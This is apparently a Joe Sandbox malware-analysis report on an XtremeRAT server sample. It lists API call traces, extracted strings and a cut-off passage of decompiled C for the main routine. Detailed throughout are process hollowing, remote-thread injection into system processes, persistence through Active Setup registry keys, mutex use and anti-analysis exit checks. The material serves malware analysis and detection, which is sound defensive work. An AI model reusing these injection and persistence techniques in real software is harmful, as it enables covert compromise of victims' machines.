Part of subcall function 00C83FDC: LoadResource.KERNEL32(00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C8400F
Part of subcall function 00C83FDC: LockResource.KERNEL32(00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84017
Part of subcall function 00C83FDC: FreeResource.KERNEL32(00000000,00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C8402B

SHDeleteKeyW.SHLWAPI(80000001,SOFTWARE\XtremeRAT), ref: 00C89CD2

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89D53

Part of subcall function 00C835DC: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C83610
Part of subcall function 00C835DC: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8361F
Part of subcall function 00C835DC: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8363B
Part of subcall function 00C835DC: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C83649
Part of subcall function 00C835DC: ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C8365A
Part of subcall function 00C835DC: CloseHandle.KERNEL32(00000000), ref: 00C83660

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89DC2
DeleteFileW.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89DC8
SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E15
DeleteFileW.KERNEL32(00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E1B

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

GetLastError.KERNEL32(00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E85
ExitProcess.KERNEL32(00000000,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E93
Sleep.KERNEL32(000003E8,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89EA7

Part of subcall function 00C89790: GetLocalTime.KERNEL32 ref: 00C89797
Part of subcall function 00C89790: GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,00C8F8B4,000000FF), ref: 00C897B0
Part of subcall function 00C89790: GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C897E0

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,?,00000000,ServerStarted,?,00C89F0A,00000002,00C8F8B4,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,?,00000000,ServerStarted,?,00C89F0A,00000002,00C8F8B4,00000000), ref: 00C82FCE

GetModuleFileNameW.KERNEL32(00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE), ref: 00C89F45

Part of subcall function 00C84914: SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C84A79
Part of subcall function 00C84914: CopyFileW.KERNEL32(00C8FAC0,00000000,00000000), ref: 00C84A8F
Part of subcall function 00C84914: SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000080), ref: 00C84B11
Part of subcall function 00C84914: CopyFileW.KERNEL32(00C8FAC0,00000000,00000000), ref: 00C84B27

SetFileAttributesW.KERNEL32(?,00000080,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C89F90
SetFileAttributesW.KERNEL32(00000000,00000080,?,00000080,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C89FA5

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C83775

GetLastError.KERNEL32(00000000,00000000,00C8F3DA,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000), ref: 00C8A17F
CloseHandle.KERNEL32(00000000), ref: 00C8A18C
CloseHandle.KERNEL32(00000000), ref: 00C8A1FD

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5
Part of subcall function 00C83EA8: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA
Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Part of subcall function 00C83EA8: Sleep.KERNEL32(00000064), ref: 00C83F64

Part of subcall function 00C83B10: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00C83B23
Part of subcall function 00C83B10: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,?), ref: 00C83B4D
Part of subcall function 00C83B10: GetModuleFileNameExW.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,?), ref: 00C83B64
Part of subcall function 00C83B10: CloseHandle.KERNEL32(?), ref: 00C83B85

Part of subcall function 00C83094: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
Part of subcall function 00C83094: CloseHandle.KERNEL32(00000000), ref: 00C830C0
Part of subcall function 00C83094: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
Part of subcall function 00C83094: FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
Part of subcall function 00C83094: DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

SetFileAttributesW.KERNEL32(00000000,00000080,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C8A362
GetModuleFileNameW.KERNEL32(00000000,00C8FAC0,0000020A,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000), ref: 00C8A416
GetCurrentProcessId.KERNEL32(00000002,00C90FDC,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C8A452
CloseHandle.KERNEL32(?), ref: 00C8A49E

Part of subcall function 00C84600: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Part of subcall function 00C84600: Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
Part of subcall function 00C84600: GetThreadContext.KERNEL32(?,?), ref: 00C84707
Part of subcall function 00C84600: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
Part of subcall function 00C84600: NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
Part of subcall function 00C84600: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
Part of subcall function 00C84600: VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
Part of subcall function 00C84600: SetThreadContext.KERNEL32(?,?), ref: 00C84885
Part of subcall function 00C84600: ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Sleep.KERNEL32(000003E8,00C91F1C,?,00000000,00000000,00000002,00C90FDC,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C8A4C0
ExitProcess.KERNEL32(00000000,000003E8,00C91F1C,?,00000000,00000000,00000002,00C90FDC,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000), ref: 00C8A4C7
CloseHandle.KERNEL32(?), ref: 00C8A4DB
TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000000,00C8F38C,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000), ref: 00C8A5D5

Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D
Part of subcall function 00C88BC0: GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33
Part of subcall function 00C88BC0: Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DD4
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DDD
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
Part of subcall function 00C88BC0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

CloseHandle.KERNEL32(?), ref: 00C8A4FF

Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
Part of subcall function 00C83CE4: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C83D26
Part of subcall function 00C83CE4: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,00000000,00008000), ref: 00C83D35
Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,00003000,00000040,?,?,00000000,00008000), ref: 00C83D48
Part of subcall function 00C83CE4: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,00000000,00008000), ref: 00C83D50
Part of subcall function 00C83CE4: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,?), ref: 00C83D71
Part of subcall function 00C83CE4: CloseHandle.KERNEL32(?), ref: 00C83D77

Sleep.KERNEL32(000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C8A522
TerminateProcess.KERNEL32(?,00000000,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000), ref: 00C8A53E
GetLastError.KERNEL32(00000000,00000000,00C8F38C,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C), ref: 00C8A568
CloseHandle.KERNEL32(00000000), ref: 00C8A576
TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000000,00C8F38C,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000), ref: 00C8A58D

Part of subcall function 00C840F8: DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C8A600

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Part of subcall function 00C87B84: SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
Part of subcall function 00C87B84: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
Part of subcall function 00C87B84: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
Part of subcall function 00C87B84: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000), ref: 00C87C6C
Part of subcall function 00C87B84: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
Part of subcall function 00C87B84: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
Part of subcall function 00C87B84: DeleteFileW.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001), ref: 00C87CEE
Part of subcall function 00C87B84: CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C83A54: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Part of subcall function 00C83A54: Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83A94
Part of subcall function 00C83A54: CharUpperW.USER32(00000000), ref: 00C83AA4
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ABF
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ACA
Part of subcall function 00C83A54: Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
Part of subcall function 00C83A54: CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Part of subcall function 00C89840: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89855
Part of subcall function 00C89840: RegQueryValueExW.ADVAPI32(?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89876
Part of subcall function 00C89840: RegCloseKey.ADVAPI32(00000000,?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C8988C

Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(user32.dll), ref: 00C898EA
Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C898F4
Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(shell32.dll), ref: 00C898FE
Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00C89908
Part of subcall function 00C898DC: MessageBoxW.USER32(00000000,?,?,?), ref: 00C899C3

Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88934
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C8894D
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88966
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C8897F
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88998
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889B1
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889CA
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889E3
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889FC
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A15
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A2E
Part of subcall function 00C88918: GetTickCount.KERNEL32(00000000), ref: 00C88A40
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A57
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A6C
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A81
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A96
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AAB
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AC0
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AD5
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AEA
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AFF
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B14
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B29
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B3E
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B53
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B68
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B78
Part of subcall function 00C88918: GetTickCount.KERNEL32(00000000), ref: 00C88B8B
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88BB2

Strings

Software\Microsoft\Active Setup\Installed Components\, xrefs: 00C8A11C
4y*, xrefs: 00C8A251
.xtr, xrefs: 00C8A3C2
SOFTWARE\XtremeRAT, xrefs: 00C89CC8
local, xrefs: 00C8A3EF
svchost.exe, xrefs: 00C8A196
\Microsoft\Windows\, xrefs: 00C89CDC
.cfg, xrefs: 00C89D01, 00C89D30
XTREME, xrefs: 00C8A42F
Mutex, xrefs: 00C8A489
SOFTWARE\, xrefs: 00C8A472
ServerStarted, xrefs: 00C89EFB
explorer.exe, xrefs: 00C8A383
open, xrefs: 00C89C47, 00C8A5F9
XTREMEUPDATE, xrefs: 00C89C5A
InstalledServer, xrefs: 00C8A0D9
SOFTWARE\, xrefs: 00C89EEF, 00C8A0CD
CONFIG, xrefs: 00C89CB4, 00C89D77, 00C89DFB, 00C89E43

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C89AEE, Relevance: 79.3, APIs: 28, Strings: 17, Instructions: 589
sleep

C-Code - Quality: 65%

			E00C89AEE(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v24;
				char _v6196;
				char _v6200;
				char _v6204;
				char _v6208;
				char _v6212;
				char _v6216;
				signed int _t35;
				char* _t42;
				void* _t50;
				long _t51;
				void* _t64;
				void* _t72;
				void* _t85;
				void* _t101;
				intOrPtr _t143;
				intOrPtr* _t144;
				intOrPtr _t146;
				intOrPtr* _t147;
				void* _t154;
				long _t155;
				int* _t166;
				int* _t171;
				int* _t177;
				intOrPtr* _t190;
				intOrPtr* _t204;
				void* _t227;
				WCHAR* _t240;
				void* _t279;
				void* _t303;
				void* _t311;
				WCHAR* _t345;
				signed int _t348;
				void* _t383;
				void* _t386;
				intOrPtr _t396;
				intOrPtr _t421;
				intOrPtr _t423;
				intOrPtr* _t427;
				intOrPtr _t431;
				intOrPtr* _t433;
				intOrPtr _t457;
				void* _t458;
				intOrPtr _t459;
				void* _t470;
				WCHAR* _t476;
				void* _t481;
				intOrPtr _t482;
				void* _t484;
				void* _t486;
				void* _t487;
				intOrPtr _t489;
				intOrPtr _t490;
				void* _t508;

				_t480 = __esi;
				_t341 = __ebx;
				asm("adc al, [eax]");
				 *__eax =  *__eax + __eax;
				asm("clc");
				0xc8();
				_t35 = __eax - 0x00000001 & 0x23e000c8;
				asm("enter 0xa400, 0x23");
				asm("enter 0xbc00, 0x25");
				asm("enter 0x8c00, 0x25");
				asm("enter 0x5400, 0x29");
				asm("enter 0x2400, 0x29");
				asm("enter 0x8c00, 0x29");
				asm("enter 0x5c00, 0x29");
				asm("enter 0x800, 0x2b");
				asm("enter 0xd800, 0x2a");
				asm("enter 0x7800, 0x2d");
				asm("enter 0x4800, 0x2d");
				asm("enter 0xd000, 0x3c");
				asm("enter 0x8800, 0x3c");
				asm("enter 0xc400, 0x3f");
				asm("enter 0x9400, 0x3f");
				asm("enter 0x6400, 0x40");
				asm("enter 0x3400, 0x40");
				asm("enter 0xe000, 0x45");
				asm("enter 0xb000, 0x45");
				asm("enter 0xc00, 0x49");
				asm("enter 0xdc00, 0x48");
				asm("enter 0x6c00, 0x50");
				asm("enter 0x3c00, 0x50");
				asm("enter 0xdc00, 0x79");
				asm("enter 0xa000, 0x79");
				asm("enter 0x1800, 0x7e");
				asm("enter 0xd000, 0x7d");
				asm("enter 0xc00, 0x81");
				asm("enter 0xdc00, 0x80");
				asm("enter 0xc800, 0x88");
				asm("enter 0x9800, 0x88");
				asm("enter 0x0, 0x0");
				 *_t35 =  *_t35 + _t35;
				asm("enter 0x300, 0x0");
				 *_t35 =  *_t35 + _t35;
				asm("enter 0xd800, 0xb0");
				asm("enter 0x6800, 0x9a");
				asm("enter 0xd400, 0xb0");
				asm("enter 0x5400, 0x9a");
				asm("enter 0x5500, 0x8b");
				_t486 = _t487;
				_push(_t35);
				_t489 = _t487 + 0xffffffffffffe7c0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v6212 = 0;
				_v6216 = 0;
				_v6208 = 0;
				_v6204 = 0;
				_v6200 = 0;
				_v24 = 0;
				E00C82504(0xc89af0);
				_push(_t486);
				_push(0xc8a62b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t489;
				E00C81618(0xc89b88);
				_t42 =  *0xc8b108; // 0xc8b018
				 *_t42 = 1;
				SetErrorMode(0x8007); // executed
				Sleep(0x64); // executed
				E00C81C90( &_v24, E00C83420(1, __ebx, __esi));
				_t396 =  *0xc8b0d4; // 0x2ad9f4
				E00C81DBC(_v24, _t396);
				if(0 == 0) {
					ShellExecuteW(0, L"open", E00C83420(0, __ebx, _t480), 0, 0, 0);
					ExitProcess(0);
				}
				_t50 = E00C8263C(0, 0, L"XTREMEUPDATE"); // executed
				_t470 = _t50;
				_t51 = GetLastError();
				_t495 = _t51 - 0xb7;
				if(_t51 == 0xb7) {
					Sleep(0x1770);
				}
				CloseHandle(_t470);
				E00C8291C();
				E00C83FDC(0,  &_v6196);
				_t481 =  &_v6196;
				memcpy(0xc8e07c, _t481, 0x607 << 2);
				_t490 = _t489 + 0xc;
				_t473 = _t481 + 0xc0e;
				E00C82B90(0xc8e07c, _t341, L"CONFIG", 0x181c, _t481 + 0xc0e, _t481, _t495);
				SHDeleteKeyW(0x80000001, L"SOFTWARE\\XtremeRAT"); // executed
				_t342 = E00C833A8(E00C8310C(), L"\\Microsoft\\Windows\\", _t495);
				_t64 = E00C834C4(_t62);
				_t496 = _t64 - 1;
				if(_t64 != 1) {
					_t345 = E00C833A8(E00C833A8(E00C833A8(E00C8310C(), "\\", __eflags), 0xc8f38c, __eflags), L".cfg", __eflags);
				} else {
					_t345 = E00C833A8(E00C833A8(_t342, 0xc8f38c, _t496), L".cfg", _t496);
				}
				_t72 = E00C835B0(_t345);
				_t497 = _t72;
				if(_t72 != 0) {
					SetFileAttributesW(_t345, 0x80);
					 *0xc8f8a0 = E00C835DC(_t345, 0xc8f8a8);
					 *0xc8f8a4 = 0xc8f8a8;
					E00C83674(_t345);
					E00C82B90( *0xc8f8a8, _t345, L"CONFIG",  *0xc8f8a0, _t473, _t481, _t497);
					E00C8291C();
					E00C82914(0xc8e07c,  *0xc8f8a8);
					if( *0xc8f690 != 0x1e240) {
						SetFileAttributesW(_t345, 0x80);
						DeleteFileW(_t345);
						E00C8291C();
						E00C83FDC(0,  &_v6196);
						_t481 =  &_v6196;
						memcpy(0xc8e07c, _t481, 0x607 << 2);
						_t490 = _t490 + 0xc;
						_t473 = _t481 + 0xc0e;
						E00C82B90(0xc8e07c, _t345, L"CONFIG", 0x181c, _t481 + 0xc0e, _t481, 0);
					}
				}
				SetFileAttributesW(_t345, 0x80); // executed
				DeleteFileW(_t345); // executed
				 *0xc8f8a8 = E00C81100(0x181c);
				E00C82914( *0xc8f8a8, 0xc8e07c);
				E00C82B90( *0xc8f8a8, _t345, L"CONFIG", 0x181c, _t473, _t481, 0);
				E00C83218(_t345,  *0xc8f8a8, 0x181c, 0); // executed
				E00C83674(_t345);
				_t85 = E00C8263C(0, 0, 0xc8f38c); // executed
				 *0xc8f8b0 = _t85;
				if(GetLastError() == 0xb7) {
					ExitProcess(0);
				}
				_t482 =  *0xc8f414;
				if(_t482 <= 0) {
					L15:
					E00C81C90( &_v6200, _t345);
					E00C81D04(_v6200);
					E00C82914(0xc918fc, _t345);
					E00C89790(0xc8f8b4);
